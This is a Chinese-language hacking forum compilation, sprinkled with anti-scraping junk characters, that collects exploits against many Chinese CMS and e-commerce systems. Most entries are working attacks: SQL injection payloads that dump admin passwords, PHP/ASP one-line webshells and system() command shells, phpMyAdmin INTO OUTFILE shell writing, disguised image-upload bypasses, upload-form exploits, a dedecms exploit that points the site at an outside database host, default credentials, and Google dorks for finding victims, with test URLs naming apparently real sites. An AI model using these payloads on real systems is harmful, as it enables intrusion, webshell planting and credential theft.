启航企业建站系统 cookie注入漏洞通杀所有版本2 j# E# F8 N2 h5 g. w$ e+ n
0 k, w0 v1 n# |! ^, D4 }
直接上exploit:
/ l: w' ^, [5 o- P2 }3 U+ _javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
' W) Y0 y$ @( L* ^- P: atest:http://www.tb11.net/system/xitong/shownews.asp?id=2101 J1 l/ j4 f) Q1 d9 A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: R+ _7 [! `- k! I# e4 u; \Asprain论坛 注册用户 上传图片就可拿到webshell& Q3 f# B6 w' |" k
, X0 W4 A" i% {3 OAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
7 M; H7 e$ n: x3 L1.txt存放你的一句话马 如:<%execute(request("cmd"))%>- T* L% d5 l6 L
2.gif 为一小图片文件,一定要小,比如qq表情图片
1 z* X9 k" A- B9 L* l3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用( [$ P3 Z- z8 M2 o4 b2 p, F4 H
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了, X3 ]& ^3 ?, p; }7 |3 T# W7 f
5.q.asp;.gif/ N9 j2 v; g/ z3 E
google:Powered by Asprain
2 x& f- K( A+ J7 y2 G, r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, Z$ `2 `, D6 e. r: v8 \
3 P3 h+ F4 R) r
ShopNum1全部系统存在上传漏洞。
) V; Z$ N2 [2 g1 _& \
) H9 r) d& |* ^# ^3 ~, m首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。. d5 c* e( c& ?& P( C' r9 _
按说明 提示登录后台。。
7 Y7 ^+ o2 G; B7 J: h3 C! K! a在后台功能页面->附件管理->附件列表! e2 S7 {3 I0 D& T+ v4 s
可以直接上传.aspx 后缀木马' n |+ R ]* u+ o' @! E
http://demo.shopnum1.com/upload/20110720083822500.aspx. R, o. s2 ]: x7 |0 t2 o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, ^6 K) f2 f H; O4 r2 \/ w4 e A) ~- `8 D
牛牛CMS中小企业网站管理系统 上传漏洞6 c T, B, e3 K( R
% I- `0 v/ ^" Y# Y牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
6 U; ^) H5 h; k/ P后台:admin/login.asp
4 r+ l9 K1 i! V. t# M) y) `7 F( Vewebeditor 5.5 Nday
: p a9 A, f7 N( N* e$ mexp:4 I/ ?2 U8 s8 F- n) i6 \; T f! @% J
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?. K% q: l& w' {7 u
<input?type=file?name=uploadfile?size=100><br><br>?
^ z3 c6 ~& U8 |<input?type=submit?value=upload>?; `2 d$ c4 b$ g5 B1 Z
</form>
3 ~- Z: D& k, }ps:先上传小马.
9 I# A& c# t4 zinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏$ X( ]0 c' M' L1 ]: v
; |4 H* Z! W) |- Y5 k6 |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, U9 w ^# N. ]
8 V( |, r# ^5 c( t: y
YothCMS 遍历目录漏洞$ B) r) ?" V& F; g
/ e. T& m! q1 \6 ]+ ]
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。. ~5 ^4 ~/ H0 u% @5 ]
默认后台:admin/login.asp/ x. A' r$ e) \ {
遍历目录:/ ]" Q& @. x& R* r
ewebeditor/manage/upload.asp?id=1&dir=../+ V( E1 ?4 |: ^
data:: U: x9 `1 t. e9 N9 C
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa6 _! G$ k3 y8 D, A& _" `5 Y: _) f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 F/ q$ N4 b$ f
; }; k' X. t* A2 lNet112企业建站系统 1.0
& b$ t- R1 {7 R ?* n# G% V. Z+ y$ }. ?) X" A
源码简介:% Y6 _! `4 P1 b
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。/ C" @( K+ E6 X0 Y
添加管理员:7 A" j. E$ |8 l: c) F& T4 S
http://www.0855.tv/admin/admin.asp?action=add&level=2/ M7 d8 w$ U4 t: J- g" M
其实加不加都不是很重要,后台文件都没怎么作验证。$ E0 A8 o9 y3 y! m9 ~1 g
上传路径:
/ B( y6 h% g' Q' Ohttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200- y$ P0 s) l& f' g4 y( }) m
http://www.0855.tv/inc/Upfile.asp?Stype=2
6 P7 A( K0 O# U/ \; V k怎么利用自己研究。0 R2 r* f7 I( I) x
遍历目录:
! B% f! g4 N8 ^( a7 Q" Ohttp://www.0855.tv/admin/upfile.asp?path=../..% I! j; Y) E, V. K" ?; k
如:( [1 X9 Z5 B$ a
http://www.0855.tv/admin/upfile.asp?path=../admin
6 S: w1 C! ^: phttp://www.0855.tv/admin/upfile.asp?path=../data
. T1 P1 `' X( b3 u0 t2 S: X: H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* _5 F9 Q) x: L' t9 h! Q
. r; ]) t, ]/ h8 E/ {9 D. X易和阳光购物商城通杀 上传漏洞
/ Z6 W5 _( X0 A
$ b- E/ }. b% }" H前提要求是IIS6.0+asp坏境。
: p6 x- l0 u$ W& W漏洞文件Iheeo_upfile.asp 0 C2 E; | t' I W4 L1 i
过滤不严.直接可以iis6.0上传3 W8 G8 f, n- w2 a
把ASP木马改成0855.asp;1.gif3 r) T U" N( N) i
直接放到明小子上传/ w/ n9 e7 S& P
Google搜索:inurl:product.asp?Iheeoid=
& v; G# Y0 U/ o7 V0 K4 K' \8 S4 F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 R; P4 Q: T9 j& G
1 r! }/ j3 W* L5 r( X9 o1 ephpmyadmin后台4种拿shell方法$ \: e2 a6 r# J, I* x1 l7 j
2 H$ p4 `# K8 W& j, T方法一:/ k; V# i1 \7 @/ |# W
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );! F9 j; {" Q: |* w8 n W
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');6 n( [9 G( }' b1 e
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';+ ?! ?% B8 b! J( l p3 u
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
+ x6 {( i( K5 O: X. |( M一句话连接密码:xiaoma
- e' F8 M; z( Q方法二:: z8 f; O- K8 K' l2 P4 G" p
Create TABLE xiaoma (xiaoma1 text NOT NULL);
9 _7 t4 i/ H& D Y7 N. p& }7 jInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');5 ]+ d) h5 U& G# v1 T
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* z% a" C6 B# v2 H4 M* `& y& Q7 GDrop TABLE IF EXISTS xiaoma;- f, m" Y6 c' ^3 C* S
方法三:
1 V7 D9 ?* A: N读取文件内容: select load_file('E:/xamp/www/s.php');2 K1 [! J& `3 ^$ Y3 ^' i( Y, ~0 \
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'6 a9 ?' G. J1 i; B; N
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'* s- P2 w) ^6 C5 H
方法四:
1 D& y. s8 ^0 u: @; T* Y' xselect load_file('E:/xamp/www/xiaoma.php');
Y( T* E) v8 K; N/ c6 m1 Rselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ @7 ]1 E2 A8 k2 I8 b" `4 z2 h0 E
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir. T+ j2 C2 G) b1 [$ X) F6 q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( J5 ~' t! I5 a; z( b9 q% W/ s1 L
- a7 n6 P0 k% t+ ~传信网络独立开发网站源码0day漏洞2 ]$ e) k& [# d2 L" g, N% K; [! K
5 i5 _0 m, M. Z6 F2 Y' @2 J后台system/login.asp
/ N6 [) F2 o7 P' M! b5 C进了后台有个ewebeditor; }# _0 u* h: d- N* X% l# W, e
Google 搜索inurl:product1.asp?tyc= D, j: e: u, S9 n2 h6 R& z" M/ x
编辑器漏洞默认后台ubbcode/admin_login.asp
8 s6 O) Y. O% H g9 O) k数据库ubbcode/db/ewebeditor.mdb0 R! G: E5 L6 u
默认账号密码yzm 1111118 H& Q7 g' k+ Z3 S) t% M7 Y
7 }9 z C: W" q% R$ j: q+ w: T
拿webshell方法
( E, J$ Y6 L8 i9 [& z& Y登陆后台点击“样式管理”-选择新增样式
5 K4 H' Q/ m6 u样式名称:scriptkiddies 随便写 0 a; |% l& J& Z
路径模式:选择绝对路径 4 b5 `' N0 K& J5 l" i" Y
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
1 }& p7 W0 q+ d5 t3 f E图片类型比如就是我们要上传的ASP木马格式
; F8 G+ F0 y+ q上传路径:/, |2 z" J, W+ {
图片限制:写上1000 免的上不了我们的asp木马
4 w @2 c- O& ^% k4 r上传内容不要写
: s# t) ~' K: D可以提交了 & L. l& U) V* B& b- c; ?8 ?
样式增加成功!
0 f* {+ ^9 a& O5 P返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 a4 S: Z) W: _. ?* `* x
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
' E" z0 U+ U7 i网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
0 n4 I# D# E) N4 |上ASP木马 回车 等到路径
: ]5 h8 `0 q; [7 M$ a W& \. `4 m C# v( E+ p0 k
后台:system/login.asp
+ d% y4 R6 g% ~! oExp:/ i" I% m/ r4 }. j# w9 _/ a" i9 D
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master1 `2 s; v3 W6 l0 x( l3 X3 b
测试:
% D# e- g' S/ chttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master5 J) t' `, ? K! S+ _, _" P
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master6 s7 L! i" ^1 m; [# I' r. z3 E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; `) Y* }$ K! J$ n, ~# u. y" ^
3 h% z( \ |% q: X+ ifoosun 0day 最新注入漏洞
6 m* n/ x( U' C) T6 l# z
$ Q- C6 c( r$ m. O; H. e漏洞文件:www.xxx.com/user/SetNextOptions.asp+ O' A& ~- R2 U" I! V: l
利用简单的方法:8 a. I, }: K5 ]0 r2 t4 g# s
暴管理员帐号:
0 S( p- \9 \$ M- P# [6 \2 b5 S5 Q4 x- Yhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ x0 j* X/ o5 s, T7 L5 p暴管理员密码:
) @" G- i- w9 B* thttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
/ R i% W9 Y' Y c- F6 q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" f2 m' b {* k6 @6 b W" b
2 r3 O% x( C" t1 N* w* V/ w1 G网站程序的版权未知!; E/ w* j: B( [$ Z2 ^- T* {; k5 n
0 A0 |7 I9 d( k! x) _- @- H, y q默认网站数据库:& {! }* X5 a+ K2 u
www.i0day.com/data/nxnews.mdb* Z% V$ E* K5 Z% ~
ewebeditor 在线编辑器:9 H* q @; a; }5 g) ?) k- J" {$ e
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
0 |' f! n* l, d% b% L( M$ p登录地址:ewebeditor/admin_login.asp
' @/ w/ |$ j! w. Q& O. C默认密码:admin admin5 v$ ^3 V. V$ e! E
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
% z9 S# O; z7 b" i, d Y
: q% }' }$ \/ r+ YSql注入漏洞:
8 r8 [- j# J; b |http://www.i0day.com/detail.asp?id=124 j6 ~' Z+ l1 |% b. e: v6 O: v
exp:* k. ~4 g& @; k3 w/ c# [& S
union select 1,admin,password,4,5,6,7,8 from admin
" E/ G+ E2 @" a H6 X& w1 k爆出明文帐号/密码
& ^* R2 j% z2 h3 R/ n; |
( W3 V, N+ y0 y7 Q( K( o上传漏洞:. Z# T5 s8 ^9 _7 U6 _5 p# J5 j
后台+upfile.asp( `1 @3 r) {& \( V" Y o) u
如:+ z8 l4 v. K( u' `
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
5 k8 K' g X r3 |8 U. Tshell的地址:网址+后台+成功上传的马
/ j7 c4 n/ @% q; E( K$ k7 hgoogle:inurl:news.asp?lanmuName=
- k: Q9 z2 r0 Q: ?------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' O2 y0 Y n$ `$ }- F$ ^4 P1 b9 R
dedecms最新0day利用不进后台直接拿WEBSHELL s# x5 A# e _5 Y
0 e9 {" ^! t) v+ f2 O. J1 y拿webshell的方法如下:# O* O( A* p# J0 l
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.! A, N& w; C z/ W @/ ^5 n
前题条件,必须准备好自己的dede数据库,然后插入数据:% R# Y& M0 F& z- h1 V( M5 o- e- O
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); . N: W) J" h* n3 ~
; w; _6 Z8 N0 r3 o; l再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) k3 _3 |2 Y! F: s w<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">: L* B" W3 t2 N8 h- |/ U
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />" ~! L; x- {( @ s
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! Z4 J' j8 J9 [ A! @- R! T# c) ~
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ p5 H" M0 y/ f" p0 c<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* S7 y" ~2 }! n1 F<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
6 L% Z5 Z; L9 Z1 ]5 s/ I) Y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
" E* E; A/ q- p- i5 W5 X<input type="text" value="true" name="nocache" style="width:400">
3 m" X1 W% j7 L0 X1 i& g+ }<input type="submit" value="提交" name="QuickSearchBtn"><br />/ O& X9 r- c) K: ]3 r: Y
</form>. z. M. ^9 P* R4 F9 @3 p$ u1 Z
<script>
. \# P+ f6 `6 ]/ ^* N& qfunction addaction(). m& {$ ^: }- g! `: z! p
{; f$ s, m- ^$ H5 m
document.QuickSearch.action=document.QuickSearch.doaction.value;
. s" s( L! e+ {/ y}
) j( I) ]& u+ i9 j</script>4 @* J9 `; P( r. |8 o
-----------------------------------------------------------------------------------------------------------------------------------------------* h2 K1 x) Z2 y4 P+ c% O
* w j& L+ `2 b9 l( j' r
dedecms织梦暴最新严重0day漏洞
5 `7 X' Q; @4 F; r0 W" [$ {; \bug被利用步骤如下:
. q! n, `6 q5 d' a& ]3 j8 F; X4 f, fhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: H* q% l+ M5 e
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。- |% P6 z; L" z6 |/ D' c
-------------------------------------------------------------------------------------------------------------------------------------------
) R9 Q- E% B2 h1 G! f* X; y$ R
) ^2 Q! k1 B7 ]多多淘宝客程序上传漏洞 % J+ P- \! l4 P: ]. J
漏洞页面:
g/ W( b0 s: T; Dadmin\upload_pic.php& a! i R7 E4 M3 T3 f; b
传送门:; o7 a; ]) ?1 F2 y3 Y% E6 f) r
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
; S O! k" f! R" n9 y6 m* XPS:copy张图片马 直接 xxx.php 上传抓包地址!( c0 [% Z6 w- c! d9 ]7 f
------------------------------------------------------------------------------------------------------------------------------------------------------
# I. p! r1 Z1 v; {5 s- @& A9 ?1 h* `+ Q$ T9 H* I$ g) ]
无忧公司系统ASP专业版后台上传漏洞
% ], H4 Z9 ]# O" x: T5 d漏洞文件 后台上传
6 b+ F6 }/ ?" e ?( {admin/uploadPic.asp
$ X, B1 d" Y4 L$ @漏洞利用 这个漏洞好像是雷池的& k, f4 L& h+ r: E
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=11 q+ g) P/ g/ w2 J' h7 O
等到的webshell路径:
9 m4 q/ P% i! h# A1 X/UploadFiles/scriptkiddies.asp;_2.gif2 f2 P0 S- V6 t/ G
---------------------------------------------------------------------------------------------------------------------------------------------------
5 E8 z8 r, H* j
4 _; S( n4 T2 G. s( }$ V Y7 }住哪酒店分销联盟系统2010
A |2 m8 }, {Search:* [, ]3 S# W, [, x' E( e
inurl:index.php?m=hotelinfo+ W- S& z: v4 ^( O& Q7 _* i) y0 Q
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin' f$ f, v& H, b ]
默认后台:index.php?m=admin/login
; H$ |$ S& q& s4 T& ]3 u, Q& x--------------------------------------------------------------------------------------------------------------------------------------------------0 ^& W$ ^# p6 H' Q+ l! m6 z
& z5 K, G0 L+ W9 K0 W
inurl:info_Print.asp?ArticleID=% S# R0 [) v# _/ k& s& f) O
后台 ad_login.asp
' }2 h: o; E; k爆管理员密码:- _+ d9 i" X7 M9 j5 O
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin* w2 e" j7 L- r8 [+ L) T* Q6 b U
------------------------------------------------------------------------------------------------------------------------------------------------------------9 L& \4 I0 I+ K8 }* ^ w
" \5 o& }' B3 _+ [! q$ O搜索框漏洞!0 [# W( k/ H* a+ ~$ j( v
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='/ k# k' N; c& ` V7 m# g* @ [
--------------------------------------------------------------------------------------------------------------------------------------------------------
, B. L7 _" n$ A8 M$ X' @
+ x* A) G2 Z2 O% ]关键字:9 m1 o% y5 Y. ^" y0 _4 ~* k
inurl:/reg_TemletSel.asp?step=22 v7 V. P/ \5 A+ S9 _0 b
或者% B6 }; H9 r5 v) V6 K1 ~4 M
电子商务自助建站--您理想的助手
8 o; f' D; w2 S/ O# }' h-------------------------------------------------------------------------------------------------------------------------------------------------9 b( `* x+ L: S* b: K
4 h% ~$ K8 \1 P+ fiGiveTest 2.1.0注入漏洞
, m$ Q5 X5 s" {Version: <= 2.1.0
) r9 _9 W: s* A7 k+ {/ Y9 h# Homepage: http://iGiveTest.com/
7 W* o9 g/ t8 V% O谷歌关键字: “Powered by iGiveTest”
- p* B. c) v$ v* H" M- B6 s! d! n随便注册一个帐号。然后暴管理员帐号和密码
* ^# {: @. W2 [# Q: ~http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (14 L% M: [* J* r3 b
------------------------------------------------------------------------------------------------------------------------------------------------2 C; W, _, G% E: w9 R
* O9 E# B) d1 z1 n h
CKXP网上书店注入漏洞
% T# m9 D: a) z: ~5 \; H2 v工具加表:shop_admin 加字段:admin
* {6 u: V* e3 t: j$ X' A" H! l+ f后台:admin/login.asp 8 ?6 D9 m) E, z9 T; k
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ ~+ O6 q) }: U+ K, S: L8 Xinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息7 J5 g* x' }- v: f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ m3 \7 a) {- c, _! a' [
2 _" U+ ]7 [/ ^/ Z( z! J5 E
段富超个人网站系统留言本写马漏洞0 N+ D- |4 L: N
源码下载:http://www.mycodes.net/24/2149.htm5 c! r7 C% \5 B. m x
addgbook.asp 提交一句话。# C0 h8 K( ]) n# T* ]
连接: http://www.xxxx.tv/date/date3f.asp1 C( @7 r2 z8 c- o" U9 t, F
google:为防批量,特略!/ G& a3 u; ~5 T1 H: `
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' \; b8 T4 L; v/ I: A" l$ \1 X1 Y+ v
2 h. e& u9 \/ Q! o9 Z s智有道专业旅游系统v1.0 注入及列目录漏洞
# n% V: S5 S! {- z默认后台路径:/admin/login.asp7 n( j' ?( b7 G9 G* H6 N
默认管理员:admin$ x% b3 |5 t' G8 T3 z; \& R1 Z, c
默认密码:123456& Q5 |# \* L4 k7 p: X
SQL EXP Tset:
* `* K7 f) B' U6 _! ^8 Q4 M7 c7 dhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin9 l( B# v9 |5 q, {7 r$ ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 m+ V& g! P3 ?
6 Z& A. ~' g# Z9 j% Y; p) T1 jewebeditor(PHP) Ver 3.8 本任意文件上传0day
7 w5 m. @# }+ i2 u V7 B/ m5 IEXP:
: u6 S2 q! M) Q Q<title>eWebeditoR3.8 for php任意文件上EXP</title>
9 P4 e2 q+ y" c3 X$ T<form action="" method=post enctype="multip
" p) q7 C3 n! l+ ]% n9 D% @/ mart/form-data">
/ _. d4 k Q' O<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 6 b2 a9 y& F& v, `7 S( C
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ' y, U4 O! [* K+ s$ k# d* M8 d3 a
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> + b }3 }0 L. S5 U7 t% e% _! m8 l
file:<input type=file name="uploadfile"><br> 7 |+ f' B: u l8 l
<input type=button value=submit onclick=fsubmit()> ; Y" s5 n# p d: @8 ^7 @2 A! |
</form><br>
9 r- r& l J5 j! {<script>
. P0 n: ^0 v+ C6 g( xfunction fsubmit(){
) E( _- Z3 d, @- Dform = document.forms[0]; ; H$ c+ C, j- ?9 v
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 9 J" I0 e5 s9 U: ^. k+ {+ q P
alert(form.action); j7 ~: v/ U6 W2 F. u* y2 E; L
form.submit(); 4 W* [9 Z) a! s( [
} ?6 S/ T" s8 y7 W" G& X, t
</script>
, `: q! F! a* O: `0 W注意修改里面ewebeditor的名称还有路径。& {9 a$ Z, x! w: G. }7 p
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# J ~/ ]% S, N
1 w+ B! _- q1 e. H, a$ L% V# j
提交’时提示ip被记录 防注入系统的利用
4 V. C% a2 s" x8 z( J3 }7 F( y! T* ^网址:http://www.xxx.com/newslist.asp?id=122′
9 G3 X% F6 N8 _$ j提示“你的操作已被记录!”等信息。
8 Q- z! B2 E3 y9 z利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
& }5 {7 r, E2 V7 w: O-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 V4 e4 d8 I) ^% H" J+ i: w6 p* ~/ A" k5 u% Z1 s: z
西部商务网站管理系统 批量拿shell-0day! V8 V; Q4 l& X8 J
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 9 R0 s/ L, B; K [/ }
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛4 }4 X" s) @( k) E5 g9 {/ L) {
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合7 G' _5 b6 L4 t- o; a, V
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂" f/ B& Q' `* t8 e( p+ X
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) @* X# V8 _8 o( T8 v, o W( ^$ S, R1 _
JspRun!6.0 论坛管理后台注入漏洞
- l6 [& I6 O# i( R+ B% H4 ^! U; U: o1 |$ h' E( w
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:* a- M9 a( u( e0 T
JspRun!6.0
& R4 y1 e9 v1 R' W漏洞描述:
% N$ |" r7 ], FJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
1 ~9 i" A* J+ f% o8 Z+ A在处理后台提交的文件中ForumManageAction.java第1940行3 m9 |9 ~4 v$ }! n! w; p
String export = request.getParameter("export");//直接获取,没有安全过滤
( |! ~8 r4 J, `% pif(export!=null){" \0 F, [1 B, G7 i" ^
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
+ r9 J) o. K! r! M% v- G- E9 ~2 bif(styles==null||styles.size()==0){
9 p t# I9 U/ u3 |% Y<*参考& @. Y; d9 [9 r8 r! ^ V' O# @1 M8 a
nuanfan@gmail.com- |+ }9 R; ] x! u
*> SEBUG安全建议:# F6 P& I3 E7 H# w& H
www.jsprun.net
6 a4 m: t. y5 ^(1)安全过滤变量export
* a9 i0 w, d3 i(2)在查询语句中使用占位符" E- r! ]( H% g8 h! j1 ]+ K* v
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ ^% i" F: Y& n* G" f. z1 r
- Y5 i, {1 d8 f5 v% n. j4 f3 _( \3 E
乌邦图企业网站系统 cookies 注入
8 U O, v1 `$ r- y @: H
* Z$ W q( x, W3 {# U. N程序完整登陆后台:/admin/login.asp* L2 t2 B# O1 X9 c
默认登陆帐号:admin 密码:admin888& s0 j9 C5 A: F' e2 M$ ?, R
语句:(前面加个空格)5 W+ Z# R7 ?( \6 w1 f$ t
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
8 R$ c$ y4 v+ D: s0 K或者是16个字段:
. B. _. {, ~( a% O8 s' C7 R' `and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin5 ]4 o7 h& P* P0 F) y4 { N
爆不出来自己猜字段。
6 h6 u9 u3 t' j5 L+ j* C注入点:http://www.untnt.com/shownews.asp?=88& M- l% e( g7 n! ?, I
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp9 [* c. @# e3 f9 h3 e8 i
关键字:1 m) J& r7 A# C5 |; w
inurl:shownews?asp.id=
$ w% _0 v8 ^+ L9 @( q0 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( v; B. W- b5 d9 I" L) b3 D
; |4 V9 P# P$ K1 D8 kCKXP网上书店注入漏洞/ l# M: Z# a' V% @& s, `
( s. C3 d# u) D# R7 I- Q$ \% h工具加表:shop_admin 加字段:admin+ m6 P# U6 V) X- b% P0 G
后台:admin/login.asp
; ?+ ^/ w2 x( d9 M4 k+ d8 }% o登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/' V* [7 w0 G6 a C* b; j
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
4 T) g; \ ~% Z/ f1 |% K; H---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( p& u# x* j x2 T5 _; N& E3 ^3 d& G
YxShop易想购物商城4.7.1版本任意文件上传漏洞9 F0 w) ?+ ]- S/ M9 w
6 a" N5 Q# Q- `$ @& Khttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
. Q# U# s9 F/ f. ?跳转到网站根目录上传任意文件。
3 {7 Y( V/ ?& F1 B如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
